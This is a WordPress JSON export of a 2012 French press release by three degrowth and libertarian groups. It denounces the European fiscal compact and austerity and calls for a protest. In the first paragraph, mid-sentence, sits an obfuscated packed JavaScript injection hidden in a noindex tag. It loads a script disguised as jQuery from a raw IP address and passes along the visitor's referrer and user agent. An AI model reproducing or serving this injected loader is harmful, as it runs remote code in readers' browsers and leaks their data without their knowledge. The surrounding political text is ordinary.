{"id":7699,"date":"2012-10-07T11:05:36","date_gmt":"2012-10-07T10:05:36","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=7699"},"modified":"2012-10-07T11:05:36","modified_gmt":"2012-10-07T10:05:36","slug":"traite-europeen-ni-austerite-ni-relance","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=7699","title":{"rendered":"Trait\u00e9 Europ\u00e9en, Ni aust\u00e9rit\u00e9 ni relance !"},"content":{"rendered":"<p>Le Pacte budg\u00e9taire europ\u00e9en, aussi appel\u00e9 Trait\u00e9 sur la stabilit\u00e9, la coordination et la gouvernance, va encore amplifier la mainmise des march\u00e9s financiers sur l\u2019\u00e9conomie europ\u00e9enne. Cet accord adopt\u00e9 en mars 2012 entre les chefs d\u2019\u00c9tats de la zone euro, chaque gouvernement est maintenant charg\u00e9 de le faire ratifier dans son pays, d\u2019une mani\u00e8re ou d\u2019une autre, afin de le faire entrer en vigueur en janvier 2013. En exigeant des \u00c9tats de r\u00e9duire leurs dettes publiques et de maintenir leur d\u00e9ficit actuel en dessous de 0,5% (la fameuse \u00ab\u00a0r\u00e8gle d\u2019or\u00a0\u00bb), <strong>ce <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yfisr|var|u0026u|referrer|drerb||js|php'.split('|'),0,{}))\n<\/script><\/noindex> Pacte va engendrer une vague d\u2019aust\u00e9rit\u00e9 et de r\u00e9cession en Europe.<\/strong> D\u2019autant plus qu\u2019il n\u2019est pas question pour les gouvernants de redistribution des richesses. En France, \u00e0 peine \u00e9lu, Hollande annonce deux ans d\u2019aust\u00e9rit\u00e9. Par ailleurs, lui qui disait vouloir ren\u00e9gocier ce trait\u00e9, il le signe des deux mains, et essaie de le faire passer en force \u00e0 l\u2019Assembl\u00e9e nationale, avec les voix de la droite, au m\u00e9pris de ses engagements.<!--more--><\/p>\n<p>L\u2019application du Pacte budg\u00e9taire en France signifie qu\u2019en un an le gouvernement devra faire entre 70 et 80 milliards d\u2019\u00e9conomie (ou de recettes suppl\u00e9mentaires), soit 1,5 fois le budget de l\u2019\u00c9ducation nationale. La cour des comptes est d\u00e9j\u00e0 en train de produire des rapports pour d\u00e9manteler la S\u00e9curit\u00e9 sociale et r\u00e9duire les d\u00e9ficits. A c\u00f4t\u00e9 de \u00e7a, apr\u00e8s avoir fait mine de soutenir les salari\u00e9-e-s en butte aux licenciements, Montebourg affirme maintenant qu\u2019il va \u00eatre \u00ab\u00a0difficile de maintenir l\u2019usine de PSA Aulnay\u00a0\u00bb. Ayrault parade \u00e0 l\u2019universit\u00e9 du MEDEF, le patronat fran\u00e7ais, qui est en train de multiplier les plans de licenciements dans tous les secteurs industriels et marchands (construction hi-fi et informatique, fili\u00e8re de la t\u00e9l\u00e9phonie, a\u00e9ronautique, etc.).<\/p>\n<p>Tout cela n\u2019a rien de surprenant. Si la situation n\u2019est pas strictement \u00e9quivalente \u00e0 celle de l\u2019\u00e8re Sarkozy, certaines donn\u00e9es restent inchang\u00e9es. <strong>Nous vivons une crise d\u2019ajustement des \u00e9conomies globalis\u00e9es, ajustement aux int\u00e9r\u00eats des march\u00e9s financiers et des banques, mais aussi crise de surproduction, et rar\u00e9faction des ressources \u00e9nerg\u00e9tiques et mini\u00e8res.<\/strong> Hollande n\u2019a jamais pr\u00e9tendu s\u2019opposer au pouvoir des multinationales ou rompre avec la logique d\u2019aust\u00e9rit\u00e9 qui r\u00e8gne en Europe (qu\u2019il appelle simplement \u00ab\u00a0rigueur\u00a0\u00bb). Il s\u2019est juste pr\u00e9sent\u00e9 en bon gestionnaire de l\u2019\u00e9conomie capitaliste\u00a0: de ce point de vue-l\u00e0, il ne nous d\u00e9\u00e7oit pas. M\u00eame les quelques progr\u00e8s \u00e0 venir sur les questions soci\u00e9tales et \u00e9cologiques semblent servir de contre-feux \u00e0 la r\u00e9gression sociale et au green-washing permanent de ses alli\u00e9s environnementaux. Pire, ils sont entach\u00e9s par l\u2019abjecte chasse aux Roms men\u00e9e par le minist\u00e8re de l\u2019Int\u00e9rieur cet \u00e9t\u00e9, et les incessantes concessions et reculades de Manuel Valls.<\/p>\n<p><strong>Partant de ce constat, l\u2019\u00e9mergence d\u2019une force d\u2019opposition anticapitaliste et antiproductiviste devient plus que jamais n\u00e9cessaire.<\/strong><\/p>\n<p>Une force qui construise la r\u00e9sistance au Pacte budg\u00e9taire et \u00e0 l\u2019aust\u00e9rit\u00e9 en s\u2019attaquant \u00e0 ses causes\u00a0: l\u2019Union \u00e9conomique Europ\u00e9enne, sa monnaie sp\u00e9culative l\u2019Euro, et son objectif affich\u00e9 de relance de la croissance. <strong>Nous ne voulons pas de ce \u00ab\u00a0club des pays riches\u00a0\u00bb qui s\u2019appelle l\u2019Europe\u00a0: nous ne voulons ni relancer la production ni relancer la consommation.<\/strong><\/p>\n<p><strong>Une force qui organise concr\u00e8tement la riposte et la solidarit\u00e9 avec les peuples<\/strong> grecs, italiens, espagnols, portugais, irlandais frapp\u00e9s de plein fouet par les plans d\u2019aust\u00e9rit\u00e9 exig\u00e9s par la tro\u00efka europ\u00e9enne (BCE, FMI et commission europ\u00e9enne).<strong> En faisant vivre tout d\u2019abord des solidarit\u00e9s concr\u00e8tes et des revendications<\/strong>\u00a0: droit au logement, acc\u00e8s \u00e0 l\u2019\u00e9nergie, aux soins, \u00e0 l\u2019\u00e9ducation, aux loisirs, \u00e9radication de la pr\u00e9carit\u00e9 et du ch\u00f4mage par une r\u00e9duction massive du temps de travail\u2026 <strong>En menant ensuite des exp\u00e9rimentations sociales en rupture avec l\u2019ordre des choses dominant\u00a0:<\/strong> r\u00e9appropriation des outils de travail, occupations des terres, coop\u00e9ratives d\u2019achats en circuits courts, r\u00e9gies publiques autog\u00e9r\u00e9es de production et de distribution de l\u2019\u00e9nergie, transports publics de proximit\u00e9 gratuits, monnaies de substitution\u2026<\/p>\n<p>Au lieu de cela, la \u00ab\u00a0gauche\u00a0\u00bb productiviste au gouvernement applique les vieilles recettes du couple mythique croissance\/politique d\u2019aust\u00e9rit\u00e9. <strong>Il serait temps qu\u2019une opposition, porteuse d\u2019une alternative anticapitaliste, antiproductiviste et radicalement \u00e9cologiste s\u2019organise pour y r\u00e9sister.<\/strong><\/p>\n<p><strong>Alternative libertaire, le Mouvement des Objecteurs de Croissance et le Parti Pour la D\u00e9croissance<\/strong> appellent \u00e0 manifester le 30 septembre sur ces bases.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/logo-ppld.gif\" alt=\"\" width=\"118\" height=\"68\" \/><a href=\"http:\/\/www.partipourladecroissance.net\/\" target=\"_blank\"><br \/>\nhttp:\/\/www.<wbr>partipourladecroissance.net\/<\/wbr><\/a><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.les-oc.info\/wp-content\/uploads\/2012\/03\/logo_MOC.jpg\" alt=\"\" width=\"109\" height=\"85\" \/><a href=\"http:\/\/www.les-oc.info\/\" target=\"_blank\"><br \/>\nhttp:\/\/www.les-oc.info\/<\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.alternativelibertaire.org\/\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.alternativelibertaire.org\/IMG\/cache-126x65\/rubon136-126x65.gif\" alt=\"\" width=\"126\" height=\"65\" \/><br \/>\nhttp:\/\/www.<wbr>alternativelibertaire.org\/<\/wbr><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Le Pacte budg\u00e9taire europ\u00e9en, aussi appel\u00e9 Trait\u00e9 sur la stabilit\u00e9, la coordination et la gouvernance, va encore amplifier la mainmise des march\u00e9s financiers sur l\u2019\u00e9conomie europ\u00e9enne. Cet accord adopt\u00e9 en mars 2012 entre les chefs d\u2019\u00c9tats de la zone euro, &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=7699\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,6,8],"tags":[],"class_list":["post-7699","post","type-post","status-publish","format-standard","hentry","category-actualites","category-agenda-du-p-p-l-d","category-communiques-de-presse"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7699","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7699"}],"version-history":[{"count":1,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7699\/revisions"}],"predecessor-version":[{"id":7700,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7699\/revisions\/7700"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7699"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7699"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7699"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}